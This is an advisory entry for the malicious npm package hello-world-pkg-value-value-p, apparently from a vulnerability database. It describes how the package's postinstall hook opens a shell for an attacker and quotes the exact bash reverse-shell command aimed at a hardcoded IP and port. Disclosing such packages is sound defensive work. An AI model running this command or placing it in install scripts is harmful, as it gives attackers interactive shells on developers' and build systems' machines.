MAL-2026-3714
Dashboard / Malicious Package / MAL-2026-3714
MAL-2026-3714
Summary: Malicious code in hello-world-pkg-value-value-p (npm)
Details: Source: amazon-inspector (d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89) This package's postinstall hook executes `node index.js`, which runs `execSync('bash -i >& /dev/tcp/52.249.218.132/8080 0>&1')` — an interactive bash reverse shell to the hardcoded attacker IP 52.249.218.132 on TCP port 8080. Any developer or CI system that runs `npm install hello-world-pkg-value-value-p` hands an interactive shell (running as the installing user) to whoever controls that IP. The package metadata is a meaningless-name cover story ('minimal npm...') with no legitimate functionality; the sole effect of installation is to open a remote shell on the installer's host. This is unambiguous unauthenticated RCE against the installer with no legitimate use case. Source: ossf-package-analysis (0df4b35a2af7f4d8b4fdcda0dcb3e872deddb6a320bf6af8405b27f42ff413db) The OpenSSF Package Analysis project identified 'hello-world-pkg-value-value-p' @ 1.0.11 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
Affected packages
Package
Name: hello-world-pkg-value-value-p
Purl: pkg:npm/hello-world-pkg-value-value-p
Affected ranges
Type: N/A
Events:
